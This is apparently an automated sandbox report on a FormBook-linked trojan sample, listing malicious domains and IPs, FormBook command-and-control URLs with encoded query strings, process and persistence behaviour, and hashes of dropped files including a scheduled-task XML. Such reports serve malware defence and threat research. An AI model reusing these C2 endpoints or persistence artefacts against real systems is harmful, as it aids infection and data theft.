https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fursace.club	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.trexendofparadise.club/hd05/www.thingsidonaked.com	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.224.212.212	www.trexendofparadise.club	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
216.246.47.89	musiletras.co	United States	23352	SERVERCENTRALUS	true
3.64.163.50	www.blogonrunning.com	United States	16509	AMAZON-02US	true
34.92.138.115	www.1509068.cc	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1449475
Start date and time:	2024-05-30 11:06:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	po8909893299832.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@30/15@12/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 116 Number of non-executed functions: 328
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, UserOOBEBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, audiodg.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, StartMenuExperienceHost.exe, mobsync.exe
Excluded IPs from analysis (whitelisted): 204.79.197.203
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, r.bing.com, a-0003.a-msedge.net, fe3cr.delivery.mp.microsoft.com, api-msn-com.a-0003.a-msedge.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:07:05	API Interceptor	2x Sleep call for process: po8909893299832.exe modified
05:07:07	API Interceptor	33x Sleep call for process: powershell.exe modified
05:07:10	API Interceptor	2x Sleep call for process: InXlDTKncKkCk.exe modified
05:07:13	API Interceptor	1631555x Sleep call for process: explorer.exe modified
05:07:54	API Interceptor	7115756x Sleep call for process: cscript.exe modified
11:07:08	Task Scheduler	Run new task: InXlDTKncKkCk path: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.224.212.212	Details of Your Etisalat Summary Bill for the Month of May 2024.exe	Get hash	malicious	FormBook	Browse	www.vietcadao.com/da29/?6l=Q7am8il/nsWle9qVrlpo40N7hUEpDQa8XY45vE38HJwrUpInQsvntdacZL4kVj7U+7+N&2dqhl=R2MlVxP8ert
	jqPZZhDmjh.exe	Get hash	malicious	FormBook	Browse	www.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxV
	z2______________________________.exe	Get hash	malicious	FormBook	Browse	www.theanhedonia.com/gy14/?MRmX=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58&J61h=CBZhCFnx-
	file.exe	Get hash	malicious	LummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRAT	Browse	soclaiebn.xyz/PhpMyAdmin/
	22#U0415.exe	Get hash	malicious	FormBook	Browse	www.theanhedonia.com/gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58
	RFQ-T56797W_1.xlsx	Get hash	malicious	FormBook, NSISDropper	Browse	www.narrativepages.com/ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41
	GCeHcfCef8.exe	Get hash	malicious	FormBook	Browse	www.fhstbanknigeria.com/rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs
	Audit_Confirmation_pdf.exe	Get hash	malicious	FormBook	Browse	www.brynnwpods.com/ls02/?U2MTG=IjLtFX-X1ru86jf&rrn=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlinyM3iKXNZy
	SWIFT_LETTER_A1OzGLOB0NH2.exe	Get hash	malicious	FormBook	Browse	www.brynnwpods.com/ls02/?GxoHR=VBjPa4VPhFxDNPj&_ZApkb=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlhHtHXyyNqk4
216.246.47.89	payment-order90094983.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.musiletras.co/hd05/?DPTlMXb=1/AoRKsyvPXt2IBcGLParC7mpiczmRTxS/g2b9eKRAccwmv6VWNs1AH0d61CXXusxdeK&EZX8bj=tZFTdnhXsdOx
3.64.163.50	Mekanikken.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.mindfreak.live/udud/
	PO JAN 2024.exe	Get hash	malicious	FormBook	Browse	www.hitbass.com/uonn/
	Nondesistance.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.mindfreak.live/udud/
	Platosammine.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.insist.site/8cwt/
	Forfaldendes253.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.mindfreak.live/udud/
	file.exe	Get hash	malicious	Unknown	Browse	protonmail.uk/admin
	Product Listsd#U0334r#U0334o#U0334w#U0334..exe	Get hash	malicious	FormBook	Browse	www.buyduffelbag.com/pshj/
	EST- 250424-0370pdf.exe	Get hash	malicious	FormBook	Browse	www.gaglianoart.com/kr6p/?SZ=xox7eB+63p6SuW1eJuo8FQUN04PL9LGBQZ6AkAH4A4ofWF0M1oxO4v68eT632DV5qdUhZPIAFIO6yrS7F/yNQisREVCmaAoRu1r1rgupVVzFB+iDAZK4/RYRrcfEKp/Ptw==&KZS0W=rx6X7x9
	IO23806Dwj.exe	Get hash	malicious	FormBook	Browse	www.thecoxnews.com/dn03/?Jxo=6apSRvEj3wGiCcVqx8Z6ZmdiKyNTtfvbiU2/bYwoKwI40WU8T5ZnTTBrvlZkxx9obLdn&_dhPwj=fb64Creh7T
	Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsm	Get hash	malicious	FormBook	Browse	www.thecoxnews.com/dn03/?mH=6apSRvEj3wGiCcVqx8Z6ZmdiKyNTtfvbiU2/bYwoKwI40WU8T5ZnTTBrvlZkxx9obLdn&blMXi=UTIlCLfpPh9tBHY

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SERVERCENTRALUS	w5c8CHID77.exe	Get hash	malicious	Unknown	Browse	216.246.112.102
	https://primecargohub.com	Get hash	malicious	GRQ Scam	Browse	50.31.174.91
	payment-order90094983.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	216.246.47.89
	b12f6c1d-32f8-c92a-ad8e-cf01cd50db87.eml	Get hash	malicious	HTMLPhisher	Browse	205.234.232.49
	INQ No. HDPE-16-GM-00- PI-INQ-3001.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	205.234.233.38
	INQ No.KP-50-000-PS-IN-INQ-0027.exe	Get hash	malicious	FormBook	Browse	205.234.233.38
	Yui1pUgieI.elf	Get hash	malicious	Mirai	Browse	205.234.173.1
	ndvdikok.vbs	Get hash	malicious	DarkGate, MailPassView	Browse	205.234.201.153
	https://ym6hc4gbb.cc.rs6.net/tn.jsp?f=001n209emIAeC5QJJGtmLyCc1JCQhC6WWTJBpDN65UPPB3G7Jc3gS6FE5wY-dlsmfGB2oibtx69nM243xkUAk5hSfd1krgPjddqmNEffcBMlXoUc-7UzTKQzIO6cFbowvNDiHeCqkvDBf2IjYJyuuzL-7jENnNra-V4&c=&ch=&__=///cpsess/guytrscdvfhgjbknkghjfbghklnm/hgjbdsaknjaxbgrak/ryan_howard@office.com	Get hash	malicious	HTMLPhisher	Browse	205.234.232.49
	Scan001-929999.exe	Get hash	malicious	FormBook	Browse	198.38.83.196
TRELLIAN-AS-APTrellianPtyLimitedAU	Ajanlatkeres_2024.05.29.PDF.exe	Get hash	malicious	FormBook, Lokibot	Browse	103.224.212.213
	http://www.adrus.com/extranet/csxEquipment/EquipmentSpecifications/cs_SpecificationMainPage.htm	Get hash	malicious	Unknown	Browse	103.224.182.246
	Details of Your Etisalat Summary Bill for the Month of May 2024.exe	Get hash	malicious	FormBook	Browse	103.224.212.212
	file.exe	Get hash	malicious	CMSBrute	Browse	103.224.212.214
	HELP_DECRYPT.HTML	Get hash	malicious	Unknown	Browse	103.224.212.237
	SlHgSOYcMY.exe	Get hash	malicious	Unknown	Browse	103.224.212.34
	Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsm	Get hash	malicious	FormBook	Browse	103.224.212.214
	Swift Copy.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.212.217
	0rVlyonS3R.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.182.246
	https://upsmychoicedeals.com	Get hash	malicious	Unknown	Browse	103.224.212.216
AMAZON-02US	MWwbGhEqS4.elf	Get hash	malicious	Mirai	Browse	13.214.128.136
	aKCWAogE2U.elf	Get hash	malicious	Mirai	Browse	18.187.184.152
	6o85zATp5y.elf	Get hash	malicious	Mirai	Browse	44.244.63.92
	https://www.mediafire.com/file/v5sxes8w7wva3vy/WuWaRu.rar/file	Get hash	malicious	Unknown	Browse	52.17.40.72
	https://add.hotel-73931.eu/info-503423/taxi3	Get hash	malicious	Unknown	Browse	52.19.167.156
	https://argodol.com/ie?v=4&c=pNl_LY5tgxsDVFJ7yjAhxUK53mrL8P-PIMg9guWrcdh3GO5zzQhV7iCF-mGXFebG9h8YlE_RVXPcp49vtB1cCgv2a0l2octZulitWCBOJPArDSW-2qNb3FLq9ypF1k-Vk1irZOwsjsML77pmTp3XSP6169vVcR4Zittr_YOJhI9	Get hash	malicious	Unknown	Browse	13.248.169.48
	Bank Failed Payment Report.exe	Get hash	malicious	FormBook	Browse	3.125.172.46
	https://batch.riskscreen.com/onboardingdataexternal/requestcode/AY4--slash--Z9ub6zFK8Y0gDoHVbJyBDZkSVCgpBVURhDw6i--plus--urpfR--plus--C6E5bReZ8eL0y813XjmQRuzWIM2vQ0a9erikAyc1sTJf5PZOs6Z26xbq1hX5az--slash--i?userid=8aMglaLbi3Zf4XVbP8jOnC5A56AE7wOpII1A1WEWb4Zc3B76aOJFEGAjjuAvHiQZmsLRlQB2s5RkwOMFacFcowNg57t6C7iRfei23vtNq3PCF4Lp&prospectid=sdC0gVM4zc--plus--RkeRlXwDH0JmlMZNyQ9Neb55DDpGiQB72qBGwoZXD1DSO1rkqWMMKKa0fJRK1&onboardingid=KILdBtWdOnldyEyq--plus--6JvwHe2TeBwLCRvPkDjXSrtgCuWOAKFn245Ed5ugX5Gdr247o6ecAPJ&kycuser=SdRy69Iz31kOjqqymNNpfe--slash--0LASWmkboVitY71voqg--plus--OL9uO5rn--plus--QQ9diQod5BVRSU8z0rMCUQ8tVjBUvvqv2AwBEtwIRLEQ2ihJUmE6mFU%253d&email=4IEHQt9A7Xr4rF0ugDxmD4jnFNf--slash--Wu--plus--kGlE2E46qr4qpoQ23WiSWr6TSNEjQE--slash--gfDmzKdXj8c4XB4U8XkRbkoPFPCFM%253d&__BusinessUnit=10	Get hash	malicious	Unknown	Browse	18.239.69.109
	https://sway.cloud.microsoft/rqMZ5i8oQNM2rDCe?ref=Link	Get hash	malicious	Unknown	Browse	18.239.83.58
	https://aka.ms/LearnAboutSenderIdentification	Get hash	malicious	Unknown	Browse	52.212.196.90

Process:	C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\po8909893299832.exe.log

Download File

Process:	C:\Users\user\Desktop\po8909893299832.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:lGLHyIFKL3IZ2KRH9Ougss
MD5:	C961E3496AA47D8AF3F9E184D4F78133
SHA1:	0EFEA67BD361E99BBE642D6EF414EBE7BB6EC134
SHA-256:	303E0E36CAC4900807E47B6AF8CDAB4FBFDB6A67D66F84F49E283557EA1774B1
SHA-512:	C3ECDCCF25D96C4F0C7B6407C8BAA7A0496C656C63E4757982FA1A754AF5B7902F3318F0AFE1363F365714584869A5E1E754692A84D814DD9EFDEB909A3104A3
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05pywxbk.xl0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20dknizx.5to.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_clng4yge.m2v.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emer1xxt.5gr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fitxycg0.fkb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olj4z0jo.grd.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsf0gbqu.3qj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vusijrf1.ihu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp6E21.tmp

Download File

Process:	C:\Users\user\Desktop\po8909893299832.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1586
Entropy (8bit):	5.116973095531347
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtkxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuT0v
MD5:	4BA7C3E6CA91B83BEFD0C5094144FE07
SHA1:	4E58B0F1096D8F238BEFD481AF45FDEE98567858
SHA-256:	2A3FEAD46F7FF163393646635AC32D2B4D8F88238777C2D4AC1AD11AB9C909F8
SHA-512:	EEAE3C44ED792F29E66F529AAD66357ECC29FE420B30B2F6911DC0F19DA86384EC821C12E6AED588A26C313CDF2293FB4E97899D7A189FE76593931D7E113F15
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp7E6D.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1586
Entropy (8bit):	5.116973095531347
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtkxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuT0v
MD5:	4BA7C3E6CA91B83BEFD0C5094144FE07
SHA1:	4E58B0F1096D8F238BEFD481AF45FDEE98567858
SHA-256:	2A3FEAD46F7FF163393646635AC32D2B4D8F88238777C2D4AC1AD11AB9C909F8
SHA-512:	EEAE3C44ED792F29E66F529AAD66357ECC29FE420B30B2F6911DC0F19DA86384EC821C12E6AED588A26C313CDF2293FB4E97899D7A189FE76593931D7E113F15
Malicious:	false
